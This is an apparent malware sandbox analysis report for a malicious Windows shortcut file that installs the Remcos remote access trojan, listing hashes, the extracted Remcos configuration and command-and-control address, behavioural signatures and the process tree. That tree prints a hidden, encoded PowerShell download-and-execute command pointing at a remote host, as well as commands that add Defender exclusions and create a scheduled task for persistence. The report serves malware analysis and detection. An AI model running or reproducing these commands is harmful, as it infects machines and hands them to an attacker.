Analysis
-
max time kernel
147s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
26-07-2024 12:01
Static task
static1
Behavioral task
behavioral1
Sample
MalwareBazaar.lnk
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
MalwareBazaar.lnk
Resource
win10v2004-20240709-en
General
-
Target
MalwareBazaar.lnk
-
Size
2KB
-
MD5
a38b0a4d0768ba8ce7c73904b55ee9ff
-
SHA1
a1a13ef45fcf88eaff3dcffba1fb2608aa07e3c8
-
SHA256
3f2491926888db2c9d6c7b1a426ff41e1cd4a13bc922156a814b9fe3032ff809
-
SHA512
4159cd37110d910624b8bb5c837e70668b3e6d795e1ab276ea32f5ab315509dedf11bd865d4c1be41f9cec698235453996939a0ac8a45f36a28a45bdf28b7cf8
Malware Config
Extracted
remcos
RemoteHost
204.10.160.230:7983
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-O7QOC3
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 9 4972 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 4972 powershell.exe 3616 powershell.exe 2244 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exePuttyTest777.pifdescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation PuttyTest777.pif -
Executes dropped EXE 3 IoCs
Processes:
PuttyTest777.pifPuttyTest777.pifPuttyTest777.pifpid process 1156 PuttyTest777.pif 1180 PuttyTest777.pif 4568 PuttyTest777.pif -
Suspicious use of SetThreadContext 1 IoCs
Processes:
PuttyTest777.pifdescription pid process target process PID 1156 set thread context of 4568 1156 PuttyTest777.pif PuttyTest777.pif -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exepowershell.exeschtasks.exePuttyTest777.pifPuttyTest777.pifdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PuttyTest777.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PuttyTest777.pif -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exePuttyTest777.pifpowershell.exepowershell.exepid process 4972 powershell.exe 4972 powershell.exe 1156 PuttyTest777.pif 1156 PuttyTest777.pif 1156 PuttyTest777.pif 1156 PuttyTest777.pif 1156 PuttyTest777.pif 1156 PuttyTest777.pif 3616 powershell.exe 3616 powershell.exe 2244 powershell.exe 2244 powershell.exe 1156 PuttyTest777.pif 1156 PuttyTest777.pif 1156 PuttyTest777.pif 1156 PuttyTest777.pif 2244 powershell.exe 3616 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exePuttyTest777.pifpowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4972 powershell.exe Token: SeDebugPrivilege 1156 PuttyTest777.pif Token: SeDebugPrivilege 3616 powershell.exe Token: SeDebugPrivilege 2244 powershell.exe -
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
cmd.execmd.exepowershell.exePuttyTest777.pifdescription pid process target process PID 5116 wrote to memory of 844 5116 cmd.exe cmd.exe PID 5116 wrote to memory of 844 5116 cmd.exe cmd.exe PID 844 wrote to memory of 4972 844 cmd.exe powershell.exe PID 844 wrote to memory of 4972 844 cmd.exe powershell.exe PID 4972 wrote to memory of 1156 4972 powershell.exe PuttyTest777.pif PID 4972 wrote to memory of 1156 4972 powershell.exe PuttyTest777.pif PID 4972 wrote to memory of 1156 4972 powershell.exe PuttyTest777.pif PID 1156 wrote to memory of 3616 1156 PuttyTest777.pif powershell.exe PID 1156 wrote to memory of 3616 1156 PuttyTest777.pif powershell.exe PID 1156 wrote to memory of 3616 1156 PuttyTest777.pif powershell.exe PID 1156 wrote to memory of 2244 1156 PuttyTest777.pif powershell.exe PID 1156 wrote to memory of 2244 1156 PuttyTest777.pif powershell.exe PID 1156 wrote to memory of 2244 1156 PuttyTest777.pif powershell.exe PID 1156 wrote to memory of 4808 1156 PuttyTest777.pif schtasks.exe PID 1156 wrote to memory of 4808 1156 PuttyTest777.pif schtasks.exe PID 1156 wrote to memory of 4808 1156 PuttyTest777.pif schtasks.exe PID 1156 wrote to memory of 1180 1156 PuttyTest777.pif PuttyTest777.pif PID 1156 wrote to memory of 1180 1156 PuttyTest777.pif PuttyTest777.pif PID 1156 wrote to memory of 1180 1156 PuttyTest777.pif PuttyTest777.pif PID 1156 wrote to memory of 4568 1156 PuttyTest777.pif PuttyTest777.pif PID 1156 wrote to memory of 4568 1156 PuttyTest777.pif PuttyTest777.pif PID 1156 wrote to memory of 4568 1156 PuttyTest777.pif PuttyTest777.pif PID 1156 wrote to memory of 4568 1156 PuttyTest777.pif PuttyTest777.pif PID 1156 wrote to memory of 4568 1156 PuttyTest777.pif PuttyTest777.pif PID 1156 wrote to memory of 4568 1156 PuttyTest777.pif PuttyTest777.pif PID 1156 wrote to memory of 4568 1156 PuttyTest777.pif PuttyTest777.pif PID 1156 wrote to memory of 4568 1156 PuttyTest777.pif PuttyTest777.pif PID 1156 wrote to memory of 4568 1156 PuttyTest777.pif PuttyTest777.pif PID 1156 wrote to memory of 4568 1156 PuttyTest777.pif PuttyTest777.pif PID 1156 wrote to memory of 4568 1156 PuttyTest777.pif PuttyTest777.pif PID 1156 wrote to memory of 4568 1156 PuttyTest777.pif PuttyTest777.pif
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cMD /c PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g2⤵
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Users\Admin\AppData\Roaming\PuttyTest777.pif"C:\Users\Admin\AppData\Roaming\PuttyTest777.pif"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\PuttyTest777.pif"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3616 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\HODoCxSdp.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2244 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\Admin\AppData\Local\Temp\tmp34A7.tmp"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4808 -
C:\Users\Admin\AppData\Roaming\PuttyTest777.pif"C:\Users\Admin\AppData\Roaming\PuttyTest777.pif"5⤵
- Executes dropped EXE
PID:1180 -
C:\Users\Admin\AppData\Roaming\PuttyTest777.pif"C:\Users\Admin\AppData\Roaming\PuttyTest777.pif"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4568
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD53cbb110c8306765af14935b87faff53d
SHA1b43050dbfa09f262ebf9dff16bc84d7ffd1085ef
SHA25667a9513894b6467f486f0e5bb6c14c9fb3167869f263da8512c7ae8ba69689fd
SHA512ffc1c58e2e6c3a51c893038b2907dca431731f68ded1b96fab5bf7382191979732ed9cf374277675fa01dc057f1739a54692266599ddf54676b791e72f7bf9cc
-
Filesize
1KB
MD5de6aa76f93d4b52a199d3c98d970e110
SHA104ddc85a8c120fecab8623fe4138a508928d08db
SHA256ddcd2e80e82a9efc63f8a8bac854e8e4f942c7bd4b49266cf8f4be13883294b2
SHA51243a0aaf20d756287f0fcb0d00de557b18b1f1127a8feebaf9ccb55218c7dcc484d06494f5015855fcdb72da9b34cb77e2e8792bf57afc2a3cd7eeefa5c6bb74c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD51802e375559eb1ff0f19e9f9f9ebce9d
SHA156e4885282b51d273a5c4fb8edcdb93308468c5e
SHA25674f756deec820dc45eda8b288931688cbbbb4f0e1694cd62a21d47e4d9c5817e
SHA5128cdc265b19a7f966eb0bd9524663d50b24247e3a80b5d0678094f07bd7cbad3dd414957db2614780dca9410de6c3aabee9aab109d3da1ed0f8508777c9dc969e
-
Filesize
939KB
MD53f69729a8f2b22e625bb984f28758ebc
SHA1ab8aab5952dfcf0d705daff76448920c67b6241d
SHA256d1b50fc6ce79320a88defef33baf6a51e30845bd13ab2b52f7925ba0b8f527cd
SHA512c4622e82f66aa728ded76ef628bd31ddcd35581a10a6043e735e557a26c8f9c72c67713f29a3ed90f647bf268484b44cf812918a02aa8e1539c3fdac7bcc1fa1